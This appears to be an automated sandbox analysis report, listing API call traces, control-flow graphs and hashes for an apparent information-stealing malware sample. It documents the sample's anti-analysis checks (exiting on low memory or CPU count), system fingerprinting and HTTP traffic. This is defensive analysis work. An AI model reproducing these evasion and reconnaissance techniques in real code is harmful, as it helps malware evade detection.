                                                            • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0041A607
                                                            • GetProcAddress.KERNEL32(74E00000,00879468), ref: 0041A629
                                                            • GetProcAddress.KERNEL32(74E00000,00876310), ref: 0041A641
                                                            • GetProcAddress.KERNEL32(74E00000,00879510), ref: 0041A659
                                                            • GetProcAddress.KERNEL32(74E00000,00879348), ref: 0041A672
                                                            • GetProcAddress.KERNEL32(74DF0000,00843010), ref: 0041A693
                                                            • GetProcAddress.KERNEL32(6C3C0000,00879408), ref: 0041A6B4
                                                            • GetProcAddress.KERNEL32(6C3C0000,00842FB0), ref: 0041A6CD
                                                            • GetProcAddress.KERNEL32(6C3C0000,00879618), ref: 0041A6E5
                                                            • GetProcAddress.KERNEL32(6C3C0000,008795E8), ref: 0041A6FD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad
                                                            • String ID: HttpQueryInfoA$InternetSetOptionA
                                                            • API String ID: 2238633743-1775429166
                                                            • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                                            • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                                                            • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                                            • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 665 419860-419874 call 419750 668 419a93-419af2 LoadLibraryA * 5 665->668 669 41987a-419a8e call 419780 GetProcAddress * 21 665->669 671 419af4-419b08 GetProcAddress 668->671 672 419b0d-419b14 668->672 669->668 671->672 674 419b46-419b4d 672->674 675 419b16-419b41 GetProcAddress * 2 672->675 676 419b68-419b6f 674->676 677 419b4f-419b63 GetProcAddress 674->677 675->674 678 419b71-419b84 GetProcAddress 676->678 679 419b89-419b90 676->679 677->676 678->679 680 419bc1-419bc2 679->680 681 419b92-419bbc GetProcAddress * 2 679->681 681->680
                                                            APIs
                                                            • GetProcAddress.KERNEL32(75900000,00874500), ref: 004198A1
                                                            • GetProcAddress.KERNEL32(75900000,008744E8), ref: 004198BA
                                                            • GetProcAddress.KERNEL32(75900000,00874488), ref: 004198D2
                                                            • GetProcAddress.KERNEL32(75900000,00874530), ref: 004198EA
                                                            • GetProcAddress.KERNEL32(75900000,00874518), ref: 00419903
                                                            • GetProcAddress.KERNEL32(75900000,00874850), ref: 0041991B
                                                            • GetProcAddress.KERNEL32(75900000,00842E90), ref: 00419933
                                                            • GetProcAddress.KERNEL32(75900000,00842CF0), ref: 0041994C
                                                            • GetProcAddress.KERNEL32(75900000,00874548), ref: 00419964
                                                            • GetProcAddress.KERNEL32(75900000,008744A0), ref: 0041997C
                                                            • GetProcAddress.KERNEL32(75900000,008744B8), ref: 00419995
                                                            • GetProcAddress.KERNEL32(75900000,008744D0), ref: 004199AD
                                                            • GetProcAddress.KERNEL32(75900000,00842C30), ref: 004199C5
                                                            • GetProcAddress.KERNEL32(75900000,008741B8), ref: 004199DE
                                                            • GetProcAddress.KERNEL32(75900000,00874200), ref: 004199F6
                                                            • GetProcAddress.KERNEL32(75900000,00842C90), ref: 00419A0E
                                                            • GetProcAddress.KERNEL32(75900000,00874320), ref: 00419A27
                                                            • GetProcAddress.KERNEL32(75900000,00874398), ref: 00419A3F
                                                            • GetProcAddress.KERNEL32(75900000,00842EB0), ref: 00419A57
                                                            • GetProcAddress.KERNEL32(75900000,008741E8), ref: 00419A70
                                                            • GetProcAddress.KERNEL32(75900000,00842E10), ref: 00419A88
                                                            • LoadLibraryA.KERNEL32(00874218,?,00416A00), ref: 00419A9A
                                                            • LoadLibraryA.KERNEL32(00874260,?,00416A00), ref: 00419AAB
                                                            • LoadLibraryA.KERNEL32(00874278,?,00416A00), ref: 00419ABD
                                                            • LoadLibraryA.KERNEL32(00874290,?,00416A00), ref: 00419ACF
                                                            • LoadLibraryA.KERNEL32(008743C8,?,00416A00), ref: 00419AE0
                                                            • GetProcAddress.KERNEL32(75070000,00874380), ref: 00419B02
                                                            • GetProcAddress.KERNEL32(75FD0000,008743F8), ref: 00419B23
                                                            • GetProcAddress.KERNEL32(75FD0000,008742F0), ref: 00419B3B
                                                            • GetProcAddress.KERNEL32(75A50000,00874308), ref: 00419B5D
                                                            • GetProcAddress.KERNEL32(74E50000,00842E50), ref: 00419B7E
                                                            • GetProcAddress.KERNEL32(76E80000,00874860), ref: 00419B9F
                                                            • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00419BB6
                                                            Strings
                                                            • NtQueryInformationProcess, xrefs: 00419BAA
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad
                                                            • String ID: NtQueryInformationProcess
                                                            • API String ID: 2238633743-2781105232
                                                            • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                            • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                                                            • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                            • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                              • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                              • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                            • StrCmpCA.SHLWAPI(?,0087AEB0), ref: 00406303
                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                            • HttpOpenRequestA.WININET(00000000,GET,?,0087A830,00000000,00000000,00400100,00000000), ref: 00406385
                                                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                                            • InternetCloseHandle.WININET(00000000), ref: 004064EF
                                                            • InternetCloseHandle.WININET(00000000), ref: 004064F9
                                                            • InternetCloseHandle.WININET(00000000), ref: 00406503
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                            • String ID: ERROR$ERROR$GET
                                                            • API String ID: 3074848878-2509457195
                                                            • Opcode ID: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                                            • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                                                            • Opcode Fuzzy Hash: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                                            • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcessstrtok_s
                                                            • String ID: block
                                                            • API String ID: 3407564107-2199623458
                                                            • Opcode ID: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                                            • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                                                            • Opcode Fuzzy Hash: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                                            • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00876340,?,0042110C,?,00000000), ref: 0041A82B
                                                              • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                              • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                              • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                                              • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                                                              • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                                              • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                                                              • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                                                              • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                                                            • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpylstrlen$Sleepstrtok
                                                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                            • API String ID: 3630751533-2791005934
                                                            • Opcode ID: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                                            • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                                                            • Opcode Fuzzy Hash: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                                            • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA

                                                            Control-flow Graph

                                                            APIs
                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                                                            • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                                                            • wsprintfA.USER32 ref: 00417640
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                            • String ID: :$C$\
                                                            • API String ID: 3790021787-3809124531
                                                            • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                            • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                                            • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                            • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

                                                            Control-flow Graph

                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 022D024D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID: cess$kernel32.dll
                                                            • API String ID: 4275171209-1230238691
                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                            • Instruction ID: 843d15250191d38fba398d3ca70026578c5ac18b496f9cfb788fbf15331d557a
                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                            • Instruction Fuzzy Hash: 9D525C74A11229DFDB64CF98C984BACBBB1BF09314F1480D9E54DAB365DB30AA85CF14

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00874500), ref: 004198A1
                                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,008744E8), ref: 004198BA
                                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00874488), ref: 004198D2
                                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00874530), ref: 004198EA
                                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00874518), ref: 00419903
                                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00874850), ref: 0041991B
                                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00842E90), ref: 00419933
                                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00842CF0), ref: 0041994C
                                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00874548), ref: 00419964
                                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,008744A0), ref: 0041997C
                                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,008744B8), ref: 00419995
                                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,008744D0), ref: 004199AD
                                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00842C30), ref: 004199C5
                                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,008741B8), ref: 004199DE
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                                              • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                              • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                                              • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                                              • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                                              • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                                              • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                              • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                                              • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                                              • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                                              • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                                                            • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                                                              • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                                              • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                              • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                              • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                              • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                              • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                              • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00876340,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                                            • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                                            • Sleep.KERNEL32(00001770), ref: 00416B04
                                                            • CloseHandle.KERNEL32(?,00000000,?,00876340,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                                            • ExitProcess.KERNEL32 ref: 00416B22
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                            • String ID:
                                                            • API String ID: 3511611419-0
                                                            • Opcode ID: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                                            • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                                                            • Opcode Fuzzy Hash: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                                            • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE

                                                            Control-flow Graph

                                                            APIs
                                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                            • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ??2@$CrackInternetlstrlen
                                                            • String ID: <
                                                            • API String ID: 1683549937-4251816714
                                                            • Opcode ID: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                                            • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                                            • Opcode Fuzzy Hash: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                                            • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

                                                            Control-flow Graph

                                                            control_flow_graph 1261 401220-401247 call 4189b0 GlobalMemoryStatusEx 1264 401273-40127a 1261->1264 1265 401249-401271 call 41da00 * 2 1261->1265 1267 401281-401285 1264->1267 1265->1267 1269 401287 1267->1269 1270 40129a-40129d 1267->1270 1272 401292-401294 ExitProcess 1269->1272 1273 401289-401290 1269->1273 1273->1270 1273->1272
                                                            APIs
                                                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                            • __aulldiv.LIBCMT ref: 00401258
                                                            • __aulldiv.LIBCMT ref: 00401266
                                                            • ExitProcess.KERNEL32 ref: 00401294
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                            • String ID: @
                                                            • API String ID: 3404098578-2766056989
                                                            • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                            • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                                            • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                            • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

                                                            Control-flow Graph

                                                            control_flow_graph 1275 416af3 1276 416b0a 1275->1276 1278 416aba-416ad7 call 41aad0 OpenEventA 1276->1278 1279 416b0c-416b22 call 416920 call 415b10 CloseHandle ExitProcess 1276->1279 1284 416af5-416b04 CloseHandle Sleep 1278->1284 1285 416ad9-416af1 call 41aad0 CreateEventA 1278->1285 1284->1276 1285->1279
                                                            APIs
                                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00876340,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                                            • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                                            • Sleep.KERNEL32(00001770), ref: 00416B04
                                                            • CloseHandle.KERNEL32(?,00000000,?,00876340,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                                            • ExitProcess.KERNEL32 ref: 00416B22
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                            • String ID:
